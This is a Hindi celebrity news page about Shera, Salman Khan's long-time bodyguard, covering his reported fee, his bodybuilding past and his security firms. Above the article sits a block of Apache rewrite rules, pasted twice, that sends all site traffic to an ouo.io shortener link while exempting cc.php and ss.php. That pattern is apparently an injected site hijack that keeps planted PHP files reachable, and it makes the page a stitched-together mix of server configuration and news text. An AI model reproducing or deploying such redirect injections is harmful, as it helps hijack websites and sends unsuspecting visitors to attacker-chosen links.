
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 347
Nextक्या आपको पता है सलमान खान को कौन प्रोटेक्ट करता है और उसकी फीस क्या है। जी हां, सलमान खान को पिछले 20 साल से शेरा प्रोटेक्ट कर रहा है। सलमान जहां भी जाते हैं बॉडीगार्ड शेरा हमेशा उनके साथ साये की तरह रहता है। सलमान भी उन्हें अपने परिवार से कम नहीं मानते। शेरा का असली नाम गुरमीत सिंह जॉली है। चलिए हम आपको बताते हैं शेरा से जुड़ी कुछ बातें।
जाहिर है सलमान खान को सिक्योरिटी देने वाले की फीस भी कुछ कम तो होगी नहीं। एक वेबसाइट के मुताबिक सिक्योरिटी देने के बदले शेरा साल के करीब 2 करोड़ रुपए लेते हैं यानी बतौर फीस उन्हें करीब 16 लाख रुपए महीने मिलते हैं। सिख परिवार से ताल्लुक रखने वाले शेरा को बचपन से बॉडी बिल्डिंग का शौक रहा है। यही कारण है कि वह 1987 में जूनियर मिस्टर मुंबई और इसके अगले साल जूनियर वर्ग में मिस्टर महाराष्ट्र चुने गए।
एक बार सोहेल ने शेरा को ऑफिस बुलाया था क्योंकि सलमान खान को बाहर के शोज के लिए सिक्योरिटी चाहिए थी तब वह सोहेल खान से मिले तो उन्होंने शेरा से कहा कि 'तू ही सलमान भाई के साथ बाहर शोज पर सिक्योरिटी के लिए जाया करेगा।' जिसके बाद शेरा ने सलमान को हां कह दिया। शेरा की सर्विस से खुश होकर सलमान ने हमेशा के लिए उन्हें अपना बॉडीगार्ड बना लिया। इसके बाद से वह खान परिवार के परिवार जैसे ही हैं।
शेरा की मानें तो वह सलमान की हिफाजत एक दोस्त की तरह करते हैं। शेरा मुंबई में सलमान के पड़ोस में रहते थे। सलमान के कहने पर शेरा ने अपनी इवेंट कंपनी विजक्रॉफ्ट भी खोली है। साथ ही उनकी एक अन्य कंपनी 'टाइगर सिक्योरिटी' भी है, जो सेलिब्रिटीज को सुरक्षा मुहैया कराती है।
शेरा सलमान को 'भाई' कहकर ही बुलाते हैं। इतना ही नहीं, शेरा उन्हें 'मालिक' भी कहते हैं। शेरा के मुताबिक, 'मालिक' ही मेरे लिए सब कुछ हैं। मैं उनके लिए अपनी जिंदगी भी दांव पर लगा सकता हूं। वह मेरे भगवान हैं।' शेरा आगे बताते हैं कि 'मैं सलमान भाई की फैमिली का हिस्सा हूं, मैं उनको बहुत प्यार करता हूं। मैं पिछले 20 साल से भाई के साथ हूं वह बहुत बड़े इंसान हैं। एक बार में ही सामने वाले को पहचान जाते हैं।' सलमान को जहां पहुंचना होता है, शेरा उस जगह का एक दिन पहले ही जायजा ले लेते हैं। कई बार उन्हें रास्ता साफ करने के लिए 5-5 किमी. तक पैदल चलना पड़ता है। एक बार तो शेरा को रास्ता क्लियर करवाने के लिए कार से उतरकर 8 किमी. पैदल चलना पड़ा था। शेरा का कहना है कि 'भाई के जैसी फैन फॉलोइंग मैंने आज तक किसी की नहीं देखी। सलमान भाई ने हमेशा हमसे कहा है कि भीड़ में कोई भी हो उसे चोट नहीं लगनी चाहिए। भाई का चैरिटी और फैमिली के लिए प्यार बहुत ही उम्दा है।'
आपको बता दें कि सलमान खान की ब्लॉकबस्टर फिल्म 'सुल्तान' में शेरा के बेटे टाइगर ने भी काम किया है। टाइगर इस फिल्म में असिस्टेंट डायरेक्टर थे। वहीं शेरा खुद भी 'बॉडीगार्ड' फिल्म के टाइटल ट्रैक में नजर आ चुके हैं।